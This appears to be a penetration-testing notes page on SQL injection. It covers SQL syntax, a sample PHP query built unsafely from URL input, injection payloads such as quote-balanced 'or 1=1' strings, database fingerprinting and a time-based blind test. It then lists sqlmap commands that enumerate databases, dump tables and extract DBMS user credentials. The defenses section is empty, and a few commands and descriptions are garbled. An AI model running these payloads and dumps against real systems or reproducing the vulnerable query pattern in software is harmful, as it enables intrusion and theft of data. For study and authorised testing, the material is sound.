SQL Injection

What is it?

Common SQL Verbs

Common SQL Statement verbs

SELECT - Retrieves data from a table
INSERT - Adds data to a table
DELETE - Removes data from a data
UPDATE - Modifies data in a table
DROP - Delete a table
UNION - Combines data from multiple queries

SQL Query Modifiers

WHERE
AND/OR
LIMIT #1, #2
ORDER BY #

Special Characters

' and " - string delimiters
--, /*, and # - comment delimiters
*and % - comment delimiters
; - Ends SQL statement
=

Example

When attempting a SQL injection, we ideally want to input data that will cause a syntax error, then try to get normal result with additional characters, then we can input verbs or modifiers knowing it will run.

Sample server side code

$sql = "
SELECT *
FROM sers
WHERE lname='$_GET["name"]';
"

Normal input: Defender URL: http://test.com/sqli.php?name=Defender SQL Query: SELECT * FROM Users WHERE lname='Defender'; Results: Normal result

Injected Input: Defender' URL: http://test.com/sqli.php?name=Defender' SQL Query: SELECT * FROM Users WHERE lname='Defender''; Results: ' causes syntax error

Injected Input: Defender'; -- URL: http://test.com/sqli.php?name=Defender'; -- SQL Query: SELECT * FROM Users WHERE lname='Defender''; --; Results: Returns normal result

Injected Input: Defender' or 1=1; -- URL: http://test.com/sqli.php?name=Defender' or 1=1; -- SQL Query: SELECT * FROM Users WHERE lname='Defender' or 1=1; --; Results: Return all rows from Users table

Balancing a payload

Quote balancing

If commenting -- does not work. We can alternatively use string statements. Example Injection: Defender' OR 'a'='a .Example Statement: SELECT...WHERE lname='Defender' OR 'a'='a'; .

Column numbers balancing

INSERT and UNION statment require number of columns required or used

Data type balancing

INSERT and UNION statements require data type associated with columns to match

Exploiting

DB Fingerprinting

# Special Functions/paremeters
## MySQL or SQL Server:
SELECT @@version

# String concatenation
MySQL: 'Te' 'st'
MSSQL: 'Te'+'st'
Oracle 'Te'||'st'

# Unique numberic functions
MySQL: connection_id()
MSSQL: @@pack_received
Oracle: BITAND(1,1)

In-band SQL injection

Blind SQL injection

Test by sending input of test ' {sleep 10} then {sleep 20}. And see if server takes time to respond back.

Cheat Sheet

Displayed full SQL query as a value

info FROM information_schema.processlist

Tools

SQLMAP

Open-source, python-based command line SQL injection tool created by Bernardo Damele A. G. (@#inquisdb)

See sqlmap extended help

sqlmap -hh

Test for vulnerability

sqlmap -r sqli.txt.raw

Lists Database

sqlmap -r sqli.txt.raw  --dbs

With found database, lets list the tables

sqlmap -r sqli.txt.raw  --D Logins --tables

With found tables, list all columns

sqlmap -r sqli.txt.raw  --D Logins --T usernames --columns

Dump all records on a table

sqlmap -r sqli.txt.raw  --D Logins --T usernames --dump

Search all columns for a string (Example "pass")

sqlmap -r sqli.txt.raw --search -C pass

Per found table and columns, dump information of query

Within a pentest you don't want to dump sensitive information as it gets cached on your machine, instead of --dump you can use --count to see amount of entries, then --dump --start=1 --stop=3

sqlmap -r sqli.txt.raw -D secretdb -T password --dump

Alternatively, dump 38th entry

sqlmap -r sqli.txt.raw -D secretdb -T password --dump --where=pass=38

Grab user and password on database management system (Used to administer DB)

sqlmap -r sqli.txt.raw --users --passwords

SQL Injection Defenses

Resources

PreviousSSRF NextIDOR

Last updated 4 years ago

Was this helpful?